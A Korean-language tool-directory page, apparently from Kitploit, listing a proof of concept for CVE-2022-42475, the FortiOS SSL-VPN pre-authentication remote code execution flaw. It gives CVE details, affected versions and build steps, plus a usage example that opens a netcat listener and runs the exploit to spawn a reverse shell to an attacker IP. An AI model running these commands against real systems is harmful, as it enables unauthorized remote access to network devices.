Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2022-42475-poc — 개념 증명(PoC)으로, 특정 버전의 FortiOS에서 SSL-VPN 서비스에 영향을 주는 치명적인 힙 기반 버퍼 오버플로 취약점인 CVE-2022-42475에 대한 연구 및 통제된 실험실 검증용입니다. | Kitploit
도구/GitHubGitHub/ull0a/cve-2022-42475-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubull0a/cve-2022-42475-poc

cve-2022-42475-poc

개념 증명(PoC)으로, 특정 버전의 FortiOS에서 SSL-VPN 서비스에 영향을 주는 치명적인 힙 기반 버퍼 오버플로 취약점인 CVE-2022-42475에 대한 연구 및 통제된 실험실 검증용입니다.

저장소 보기
16시간 29분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-42475 PoC

Fortinet SSL VPN 사전 인증 원격 코드 실행

설명

CVE-2022-42475는 FortiOS SSL VPN 서비스의 힙 기반 버퍼 오버플로 취약점으로, 인증되지 않은 공격자가 /remote/error 엔드포인트로 전송되는 특수하게 제작된 HTTP 요청을 통해 임의 코드를 원격으로 실행(RCE)할 수 있게 합니다.

이 취약점은 공식 패치가 발표되기 전에 실제 환경에서 활발히 악용되었습니다(0-day).

PoC 실행

다음 스크린샷은 승인된 실험실 환경에서 PoC를 실행한 모습을 보여줍니다:

출력에는 PoC 실행과 테스트에 사용된 FortiOS 인스턴스와의 상호 작용이 표시됩니다.

PoC 실행

CVE 정보

필드값
CVE IDCVE-2022-42475
CVSS 3.19.3 (치명적)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-122
발견일2022년 12월
공식 패치FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16

영향받는 버전

  • FortiOS 7.2.0–7.2.2
  • FortiOS 7.0.0–7.0.8
  • FortiOS 6.4.0–6.4.10
  • FortiOS 6.2.0–6.2.11
  • FortiOS 6.0.0–6.0.15
  • FortiOS 5.6.0–5.6.14
  • FortiOS 5.4.0–5.4.13
  • FortiOS 5.2.0–5.2.15
  • FortiOS 5.0.0–5.0.14

요구 사항

  • Go 1.18+ (PoC 컴파일용)
  • 포트 443(또는 구성된 SSL VPN 포트)에서 대상에 대한 네트워크 액세스
  • 테스트를 수행하기 위한 승인된 실험실 환경

빌드

root@kitploit:~
# Clonar o descargar el código fuente
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc

# Compilar
go build -o exploit exploit.go

# O ejecutar directamente
go run exploit.go <target> <port> <reverse_ip> <params>

사용법

root@kitploit:~
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]

예시

root@kitploit:~
# En el atacante, iniciar listener
nc -lvnp 80

# Ejecutar el exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i
도구 다운로드